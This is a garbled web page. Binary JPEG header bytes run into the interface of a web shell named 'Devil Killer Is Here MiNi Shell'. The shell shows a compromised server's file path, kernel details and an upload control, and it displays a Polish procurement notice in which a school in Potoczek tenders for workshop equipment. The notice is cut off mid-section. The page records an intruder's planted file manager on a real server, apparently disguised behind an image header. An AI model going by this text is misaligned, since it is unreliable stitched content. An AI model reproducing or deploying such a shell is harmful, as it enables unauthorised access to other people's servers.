JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250528/0025180501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu do pracowni mechanicznej ZSCKR w Potoczku<br/>w ramach projektu „Nowe kwalifikacje kluczem do sukcesu”- II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ CENTRUM KSZTAŁCENIA ROLNICZEGO W POTOCZKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000097778</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Potoczek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-313</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158740268</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">158740268</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zsckrpotoczek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsckrpotoczek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu do pracowni mechanicznej ZSCKR w Potoczku<br/>w ramach projektu „Nowe kwalifikacje kluczem do sukcesu”- II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f7a72048-e2a1-4d4f-9aed-3a7f40ff7f0d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00251805</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00011215/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Wyposażenie do pracowni mechanicznej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f7a72048-e2a1-4d4f-9aed-3a7f40ff7f0d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), zwanym dalej RODO, informuję że:<br/>1.1 Administratorem Danych Osobowych przetwarzanych w celu przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego oraz późniejszej realizacji umowy jest Zespół Szkół Centrum Kształcenia Rolniczego w Potoczku<br/>1.2 W sprawach dotyczących przetwarzania danych osobowych można kontaktować się z Inspektorem Ochrony Danych na adres<br/>email: kierownik.adm@zsckrpotoczek.pl lub pisemnie na adres siedziby Administratora<br/>1.3 Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w związku z przeprowadzeniem przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz późniejszą realizacją umowy.<br/>1.4 Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/>o postanowienia art. 74 Pzp, lub którym udostępniona zostanie umowa na podstawie przepisów prawa.<br/>1.5 Dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,<br/>a w przypadku umowy przez okres 10 lat.<br/>1.6 Obowiązek podania przez wykonawcę danych osobowych jest wymogiem wynikającym z przepisów Pzp, związanym z udziałem<br/>wykonawcy/podwykonawcy/ podmiotu na którego zasoby się powołuje w postępowaniu o udzielenie zamówienia publicznego,<br/>określony został w przepisach ustawy Pzp. Niepodanie przez wykonawcę danych osobowych uniemożliwi zamawiającemu<br/>wykonanie czynności związanych z badaniem i oceną oferty oraz ewentualne zawarcie umowy.<br/>1.7 W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.<br/>1.8 Każdy wykonawca udostępniający dane osobowe posiada prawo:<br/>1) dostępu do swoich danych osobowych (art. 15 RODO),<br/>2) do sprostowania swoich danych osobowych (art. 16 RODO) - skorzystanie z tego prawa nie może skutkować zmiana wyniku<br/>postępowania ani zmiana postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności<br/>protokołu oraz jego załączników,<br/>3) żądania od Administratora ograniczenia przetwarzania danych osobowych (art. 18 RODO),z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO, o<br/>4) do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku stwierdzenia, że przetwarzanie danych<br/>osobowych dotyczących wykonawcy narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa obejmuje elektrohydrauliczny podnośnik dwukolumnowy. Wykonawca zobowiązany będzie do dostawy urządzenia wraz z kompletem instrukcji obsługi, montażu na warsztatach szkolnych ZSCKR w Potoczku. Dostawca zobowiązany jest do uruchomienia urządzenia oraz przeprowadzenia szkolenia stanowiskowego w wymiarze 1 godz. lekcyjnej dla 6 nauczycieli. Okres gwarancji wynosi min. 24 miesiące.<br/>Parametry urządzenia:<br/>1.	Typ podnośnika : Automatyczny<br/>2.	Podnośnik wyposażony w belkę dolną<br/>3.	Podnośnik bez górnego łączenia<br/>4.	Podnośnik wyposażony w elektromagnetyczną blokadę wysokości oraz automatyczną blokadę ramion<br/>5.	Wysokość podnoszenia: minimum 1900 mm<br/>6.	Punktu podparcia: od 90 do 110 mm<br/>7.	Wysokość kolumn: od 2710 do 2995 mm <br/>8.	Odstęp miedzy kolumnami: min. 3300 mm<br/>9.	Szerokość całkowita: min. 3980 mm<br/>10.	Moc silnika: od 3 kW do 4 kW<br/>11.	Zasilanie: 400 V, 3 fazy<br/>12.	Zabezpieczenie: C 16 A<br/>13.	Udźwig: minimum 5,5 ton<br/>14.	Ramiona rozsuwane 3 stopniowo, teleskopowe ramiona podnośnika<br/>Pozostałe warunki dostawy<br/>•	Produkt dostarczony do szkoły ZSCKR Potoczek jako fabrycznie nowy.<br/>•	Koszt dostawy obejmuje pierwszy przegląd gwarancyjny, który zostanie wykonany przez autoryzowany serwis. <br/>•	Podnośnik wyposażony w olej hydrauliczny<br/>•	Podnośnik zamontowany za pomocą kotwy chemicznej wraz z atestem stal zwykła węglowa, M20 x 220mm, </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 14634,15 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42413200-6 - Podnośniki hydrauliczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty w każdej części zamówienia zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem: <br/>1)	cena ofertowa (brutto) – waga kryterium 60pkt<br/>2)	okres gwarancji i rękojmi– waga kryterium 36 pkt<br/>3)	kryterium społeczne – waga kryterium 4 pkt<br/><br/>Punkty będą przyznawane według poniższej zasady:<br/><br/>1.	Kryterium ceny oceniane będzie według wzoru:<br/><br/> Cn.<br/>P1 = -------------- x 60 pkt<br/> Cb<br/><br/>gdzie:<br/>P1- ilość punktów w kryterium cena<br/>Cn	– najniższa cena,<br/>Cb	– cena oferty badanej,<br/>60	pkt –znaczenie kryterium ceny.<br/><br/>2.	Kryterium okresu gwarancji i rękojmi na obie maszyny oceniane będzie następująco:<br/><br/>Minimalny okres gwarancji i rękojmi za wady obejmuje wszystkie elementy i podzespoły wymienione w specyfikacji poszczególnych maszyn i wynosi 24 miesiące od daty odbioru przedmiotu umowy. <br/>Zaoferowanie gwarancji i rękojmi na okres krótszy niż 24 m-ce skutkowało będzie odrzuceniem oferty. <br/> Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie 24 miesiące otrzyma 0 pkt.<br/>Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie 36 miesięcy i więcej otrzyma 36 pkt. <br/>Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie powyżej 24 miesięcy, otrzyma punkty obliczone wg następujących zasad: każdy dodatkowy miesiąc to 3 pkt, ale łącznie nie więcej niż 36 pkt. <br/><br/>3.	Kryterium społeczne – 4 pkt tj. Wykonawca mający status zakładu pracy chronionej, spółdzielnia socjalna oraz inny wykonawca, którego głównym celem lub głównym celem działalności jego wyodrębnionej organizacyjnie jednostki, która będzie realizowała zamówienie, jest społeczna i zawodowa integracja osób społecznie marginalizowanych, pod warunkiem, że procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których ppkt 1–10, jest nie mniejszy niż 30% osób zatrudnionych u wykonawcy albo w jego jednostce, która będzie realizowała zamówienie. Wartość procentowego wskaźnika ustala się w odniesieniu do ogólnego zatrudnienia w tym podmiocie osób społecznie marginalizowanych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">36,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II Zestaw do obsługi klimatyzacji pojazdów<br/>Dostawa obejmuje zestaw składający się z następujących podzespołów: <br/>1)	stacji do obsługi czynnika R1234yf, <br/>2)	stacji do obsługi czynnika R134a,<br/>3)	analizatora czynnika chłodzącego. <br/>Okres gwarancji dla całego zestawu wynosi min. 24 miesiące od daty podpisania protokołu zdawczo-odbiorczego.<br/><br/>1. STACJA DO OBSŁUGI CZYNNIKA R1234yf<br/>Opis produktu:<br/>1.	Obsługiwane pojazdy: min. samochody ciężarowe; samochody osobowe; pojazdy rolnicze; pojazdy hybrydowe; pojazdy elektryczne<br/>2.	Wydajność - pompa próżniowa: min. 100l/min<br/>3.	Możliwość pracy w rybie manualnym i automatycznym<br/>4.	Dozowanie oleju: automatyczne<br/>5.	Posiada elektroniczną wagę oleju <br/>6.	Baza danych pojazdów: min. osobowych, rolniczych, ciężarowych<br/>7.	Sterowanie otw./zamkn. przewodów LP/HP - automatyczne<br/>8.	Posiada blokadę wagi<br/>9.	Posiada drukarkę<br/>10.	Pojemność zbiornika na czynnik: min. 10 kg<br/>11.	Kolorowy wyświetlacz<br/>12.	Możliwość drukowania raportów wykonanych serwisów<br/>13.	Obsługa czynnika R1234yf<br/>14.	Długość przewodów LP/HP: min 3m<br/><br/>2. STACJA DO OBSŁUGI CZYNNIKA R134a<br/>Opis produktu:<br/>1.	Obsługiwane pojazdy: min. samochody ciężarowe; samochody osobowe; pojazdy rolnicze; pojazdy hybrydowe; pojazdy elektryczne<br/>2.	Wydajność - pompa próżniowa : min 100l/min<br/>3.	Możliwość pracy w rybie manualnym i automatycznym<br/>4.	Dozowanie oleju: automatyczne<br/>5.	Posiada elektroniczną wagę oleju <br/>6.	Baza danych pojazdów: min. osobowych, rolniczych, ciężarowych<br/>7.	Posiada sterowanie otw./zamkn. przewodów LP/HP <br/>8.	Posiada drukarkę<br/>9.	Pojemność zbiornika na czynnik min. 10kg<br/>10.	Kolorowy wyświetlacz<br/>11.	Możliwość drukowania raportów wykonanych serwisów<br/>12.	Obsługa czynnika R134a<br/>13.	Długość przewodów LP/HP: min. 3m<br/><br/>3. ANALIZATOR CZYNNIKA CHŁODZĄCEGO<br/>1.	Urządzenie umożliwia rozróżniania i analizę czynnika chłodzącego: R1234yf oraz R134a prezentacja wyniku: procentowy (%) <br/>2.	Urządzenie pracujące samodzielnie<br/><br/>Szkolenie pracowników<br/>Dostawca zestawu zobowiązuje się do przeszkolenia stanowiskowego dla 2 pracowników z zakresu obsługi klimatyzacji pojazdów.<br/>Zakres szkolenia:<br/>- BHP przy obsłudze klimatyzacji<br/>- właściwości czynników chłodniczych i ich wpływ na środowisko<br/>- budowa i zasada działanie układu klimatyzacji i podzespołów<br/>- oleje ich właściwości i zastosowanie w układzie klimatyzacji<br/>- obsługa butli z czynnikiem chłodzącym<br/>- diagnostyka układu pod kontem szczelności, kontrola ciśnień<br/>- odzyskiwanie f-gazów <br/>- sposoby odkażania parownika.<br/>Wymiar szkolenia: min. 6 h (1h = 45 min.) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 34959,35 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42512400-2 - Klimatyzatory do pojazdów mechanicznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty w każdej części zamówienia zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem: <br/>1)	cena ofertowa (brutto) – waga kryterium 60pkt<br/>2)	okres gwarancji i rękojmi– waga kryterium 36 pkt<br/>3)	kryterium społeczne – waga kryterium 4 pkt<br/><br/>Punkty będą przyznawane według poniższej zasady:<br/><br/>1.	Kryterium ceny oceniane będzie według wzoru:<br/><br/> Cn.<br/>P1 = -------------- x 60 pkt<br/> Cb<br/><br/>gdzie:<br/>P1- ilość punktów w kryterium cena<br/>Cn	– najniższa cena,<br/>Cb	– cena oferty badanej,<br/>60	pkt –znaczenie kryterium ceny.<br/><br/>2.	Kryterium okresu gwarancji i rękojmi na obie maszyny oceniane będzie następująco:<br/><br/>Minimalny okres gwarancji i rękojmi za wady obejmuje wszystkie elementy i podzespoły wymienione w specyfikacji poszczególnych maszyn i wynosi 24 miesiące od daty odbioru przedmiotu umowy. <br/>Zaoferowanie gwarancji i rękojmi na okres krótszy niż 24 m-ce skutkowało będzie odrzuceniem oferty. <br/> Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie 24 miesiące otrzyma 0 pkt.<br/>Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie 36 miesięcy i więcej otrzyma 36 pkt. <br/>Oferta, w której zadeklarowany zostanie okres gwarancji i rękojmi w liczbie powyżej 24 miesięcy, otrzyma punkty obliczone wg następujących zasad: każdy dodatkowy miesiąc to 3 pkt, ale łącznie nie więcej niż 36 pkt. <br/><br/>3.	Kryterium społeczne – 4 pkt tj. Wykonawca mający status zakładu pracy chronionej, spółdzielnia socjalna oraz inny wykonawca, którego głównym celem lub głównym celem działalności jego wyodrębnionej organizacyjnie jednostki, która będzie realizowała zamówienie, jest społeczna i zawodowa integracja osób społecznie marginalizowanych, pod warunkiem, że procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których ppkt 1–10, jest nie mniejszy niż 30% osób zatrudnionych u wykonawcy albo w jego jednostce, która będzie realizowała zamówienie. Wartość procentowego wskaźnika ustala się w odniesieniu do ogólnego zatrudnienia w tym podmiocie osób społecznie marginalizowanych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji 